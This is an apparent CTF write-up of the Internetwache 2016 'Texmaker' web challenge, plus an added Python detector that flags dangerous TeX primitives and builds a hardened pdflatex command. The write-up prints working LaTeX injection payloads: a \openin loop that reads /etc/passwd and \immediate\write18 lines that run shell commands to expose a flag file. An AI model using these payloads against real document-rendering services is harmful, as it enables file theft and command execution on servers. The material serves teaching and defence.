Internetwache CTF 2016 — Web90 — Texmaker
This problem was my favorite of those I tried. When you first navigate to the challenge site you are presented with an input field that accepts LaTeX, which is then compiled to generate a PDF.
This paper discusses methods for exploiting LaTeX, including some sample code which can be used to read files from the server:
\openin5=/etc/passwd % open the target file on input stream 5
\def\readfile{% read the stream one line at a time until end of file
\read5 to \curline
\ifeof5 \let\next=\relax
\else \curline~\\ % typeset the line, then start a new line
\let\next=\readfile
\fi
\next} %
\ifeof5 Couldn't Read the File! % stream never opened (file missing or unreadable)
\else \readfile \closein5
\fi
After generating and checking the PDF I got the following:
The next step was learning how I could execute commands to look around the file system. I came across the \immediate\write18 combination of commands in this post, which allows you to run shell commands on the server (provided the compiler was started with shell escape enabled). The following line writes the output of ls to a temporary file:
\immediate\write18{ls /tmp/ > /tmp/tmpfile}
Looking into the /var/www/texmaker.ctf.internetwache.org/ directory, I found what I suspected was my flag file (flag.php).
After trying a number of other ways of accessing the file (cat, grep, sed, head, tail, etc.) I tried running php -s, which outputs the source of the given PHP file instead of executing it.
I put together the following final payload and browsed to /pdf/derp.txt (as it was publicly accessible), revealing the flag!
\immediate\write18{php -s ../flag.php > ../pdf/derp.txt}
IW{L4T3x_IS_Tur1ng_c0mpl3te}
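As an added defender-side example (not part of the writeup), the check below flags the primitives this exploit chain depends on (\openin for the file-read loop, \write18 for command execution, and the usual ways of rebuilding them) in user-supplied TeX, and builds a pdflatex invocation with shell escape off and file access restricted. It assumes TeX Live's pdflatex, whose texmf.cnf variables (openin_any, openout_any, shell_escape) can be overridden from the environment; the sample inputs are constructed from the page's own payload lines.

```python
import re
from typing import Dict, List

# Control words end at the first non-letter, so "\openin5" must still match.
_END = r"(?![A-Za-z])"
DANGEROUS_PATTERNS = [
    ("write18", re.compile(r"\\write\s*18(?![0-9])")),  # shell escape (command execution)
    ("openin", re.compile(r"\\openin" + _END)),          # read arbitrary files via \read
    ("openout", re.compile(r"\\openout" + _END)),        # write files via \write
    ("input", re.compile(r"\\(input|include)" + _END)),  # pull in other files
    ("catcode", re.compile(r"\\catcode" + _END)),        # rebuild control sequences
    ("csname", re.compile(r"\\csname" + _END)),
    ("scantokens", re.compile(r"\\scantokens" + _END)),
]

# A '%' starts a TeX comment unless it is escaped as '\%'.
_COMMENT = re.compile(r"(?<!\\)%.*")

def find_dangerous(source: str) -> List[str]:
    """Return the labels of risky control sequences found outside comments."""
    stripped = "\n".join(_COMMENT.sub("", line) for line in source.splitlines())
    return [label for label, rx in DANGEROUS_PATTERNS if rx.search(stripped)]

def hardened_build(job_tex: str, outdir: str) -> Dict[str, object]:
    """argv and environment for compiling untrusted TeX: no shell escape, and
    \openin/\openout confined to the working tree ("p" = paranoid)."""
    argv = ["pdflatex", "-no-shell-escape", "-interaction=batchmode",
            "-halt-on-error", "-output-directory", outdir, job_tex]
    env = {"shell_escape": "f", "openin_any": "p", "openout_any": "p"}
    return {"argv": argv, "env": env}

# Constructed samples: the two payload lines from the writeup, and a benign document.
PAGE_PAYLOAD = r"""\openin5=/etc/passwd
\immediate\write18{php -s ../flag.php > ../pdf/derp.txt}
"""
BENIGN = r"""\documentclass{article}
\begin{document}
Discount: 50\% off. % \write18{ls} here is only a comment
\end{document}
"""

if __name__ == "__main__":
    print(find_dangerous(PAGE_PAYLOAD))  # ['write18', 'openin']
    print(find_dangerous(BENIGN))        # []
    print(hardened_build("job.tex", "/tmp/out")["argv"])
```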